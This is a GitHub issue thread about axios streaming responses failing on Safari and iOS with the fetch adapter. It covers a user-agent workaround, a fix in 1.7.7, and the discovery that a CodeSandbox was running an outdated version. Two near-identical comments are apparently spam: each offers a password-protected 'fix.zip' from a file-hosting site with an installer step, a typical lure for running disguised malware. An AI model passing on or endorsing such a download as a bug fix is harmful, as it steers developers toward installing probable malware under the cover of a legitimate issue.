### ISSUE TITLE
Streaming on Axios with Fetch-adapter not working on Safari

### ISSUE THREAD

**Issue by bruets** [axios/axios#6577]
### Describe the bug

Hello everyone,

a colleague of mine recently stumbled upon a bug, while using Axios on a Safari. It turns out, streaming with Axios and the fetch adapter is not possible on Safari.

I did some research in our code and found out, that the bug was introduced after switching from the native fetch library to Axios with fetch adapter. Nobody noticed it until recently, as it was working perfectly on Firefox and Chrome (even on MacOS).
After another bit of research, I could narrow it down to the ReadableStream response, that Axios is providing. See the attached CodeSandBox example for further details.

Why do I write it here, although it might be a bug related to the underlying Safari?
For the sake of documentation and for the sake of preventing others to fall into the same pit. And, perhaps, there is a possibility to mitigate the problem by handling the user agent in Axios directly (see workaround bit further below)?
A somewhat familiar (perhaps, the same?) issue was already reported on StackOverflow: https://stackoverflow.com/q/78713060

To anyone experiencing the same issue: There is a workaround. Detect the user agent and check for Safari. For Safari, instead of using Axios, use the native fetch library - just in case, you want to stick to Axios (like we did in our project)
For some inspiration, I created another CodeSandbox: https://codesandbox.io/p/devbox/ecstatic-grass-6skn7l?workspaceId=18337018-7dab-4311-9114-b5cf242336fd
It contains a browser-check using bowser-js, based on the CodeSandbox used in the "To reproduce" section. If you click on the button in the preview, it will now use Axios for the calls for the non-Safari browsers or fallback to the native fetch library for Safari.

### To Reproduce

I wrote a small example in CodeSandbox: https://codesandbox.io/p/devbox/objective-gwen-p8jlgv?workspaceId=18337018-7dab-4311-9114-b5cf242336fd

Simply click on the button reading "Click me!" in the preview to trigger the request.

Here is a screenshot of the error:
![grafik](https://github.com/user-attachments/assets/2fd5d022-323d-4db7-a335-8b65570c5c65)
Notice, how line 13 in AxiosCaller is the "culprit". The line merely consists of the `await reader.read()`, as you can see.

### Expected behavior

No error is thrown, if I access an endpoint serving a streamed response using Axios.

### Axios Version

1.7.4 (already experienced with 1.7.2+)

### Adapter Version

Fetch

### Browser

Safari

### Browser Version

17.5 (18618.2.12.111.5, 18618)

### Node.js Version

20.11.1

### OS

MacOS Version 13.6.7

### Additional Library Versions

```bash
React 18.3.1 (I suppose, it will not be of revelance, just for completeness)
```

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by heyalexchoi** [comment]
An unfortunate bug. Doesn't just impact safari, this breaks streaming responses for all iOS web users since all iOS browsers are wrappers on WebKit. Fetch workaround isn't great since my whole api client setup with token refresh, logging, etc is on an axios instance. Will probably make a "temporary" duplicate api client just for streaming and hopefully this will get fixed 🙂

**Comment by bruets** [comment]
First and foremost: Thank you for the effort, @DigitalBrainJS :)

I am not sure, whether I should re-open this issue or open a new one and reference it here.

I updated to version 1.7.7 and let my colleague do the testing. Apparently, the fix does not yet work (at least for him). I created another CodeSandbox, which reproduces the error on his side: [Here](https://codesandbox.io/p/devbox/zen-haze-nw7cvk?workspaceId=18337018-7dab-4311-9114-b5cf242336fd)

Screenshot of the error and the dependencies visible in the bottom left corner of the CodeSandbox (kindly curated by my colleague):
![grafik](https://github.com/user-attachments/assets/0117ae20-5647-41f0-a32e-4c8a58d31537)

**Comment by DigitalBrainJS** [comment]
> Apparently, the fix does not yet work (at least for him)

@bruets Seems it [works fine](https://codesandbox.io/p/devbox/axios-1-7-7-forked-8l4rp7) in a fork, but not in the original sandbox ¯\_(ツ)_/¯. Maybe there is some codesandbox issue and that is not Axios 1.7.7

![image](https://github.com/user-attachments/assets/51630498-32ff-49be-a4b4-cf1cebf97b46)

**Comment by bruets** [comment]
@DigitalBrainJS Oh god, wow. Asked my colleague, he can confirm.

I will keep that in mind for future submissions (looking for VERSION in the code and printing out axios.VERSION to make sure, the code is really running on the correct version). Again, thank you very much for the effort.

Perhaps, it might be worth to mention something like this as a hint in the bug template.
"If you submit a codesandbox, please make sure to check, whether the used version is equivalent to that of the import. Simply write `console.log(axios.VERSION)` and check"
Although, I admit, this is an edge-case.
